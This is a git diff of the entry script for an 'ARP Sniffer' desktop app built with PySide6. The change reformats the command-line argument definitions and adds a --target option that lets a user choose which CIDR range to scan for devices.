diff --git a/main.py b/main.py
index fd9dad4..4e1886c 100644
--- a/main.py
+++ b/main.py
@@ -8,13 +8,25 @@
import argparse
import sys
-from PySide6.QtWidgets import QApplication # pylint: disable=E0611
+
+from PySide6.QtWidgets import QApplication # pylint: disable=E0611
+
from core.arp_scanner import DeviceDiscoveryDialog
if __name__ == "__main__":
- parser = argparse.ArgumentParser(description='ARP Sniffer')
- parser.add_argument('--interface', required=True, help='Network interface name')
- parser.add_argument('--timeout', type=int, default=1000, help='Timeout in milliseconds for ARP scan (default: 1000)')
+ parser = argparse.ArgumentParser(description="ARP Sniffer")
+ parser.add_argument("--interface", required=True, help="Network interface name")
+ parser.add_argument(
+ "--timeout",
+ type=int,
+ default=1000,
+ help="Timeout in milliseconds for ARP scan (default: 1000)",
+ )
+ parser.add_argument(
+ "--target",
+ default=None,
+ help="Custom target CIDR range, e.g. 10.0.0.0/24 (default: interface network)",
+ )
args = parser.parse_args()
app = QApplication(sys.argv)
@@ -22,7 +34,8 @@
window = DeviceDiscoveryDialog(
args.interface,
oui_url="http://standards-oui.ieee.org/oui/oui.csv",
- timeout=args.timeout
+ timeout=args.timeout,
+ target_cidr=args.target,
)
window.show()